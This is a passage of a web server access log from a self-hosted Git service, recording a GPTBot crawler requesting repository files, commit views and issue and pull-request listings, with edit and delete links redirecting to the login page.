"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog.service" [Client 74.7.227.38] [Length 21955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:18:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fperformance_comparison.py" [Client 74.7.227.38] [Length 27345] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:18:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 25896] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:18:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fdist%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 18032] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:18:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor.spec" [Client 74.7.227.38] [Length 25877] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:18:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor.py" [Client 74.7.227.38] [Length 34723] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:18:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 65172] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" -[17/Feb/2026:18:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" -[17/Feb/2026:18:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11034] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11772] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11753] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27665] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" -[17/Feb/2026:18:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12366] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 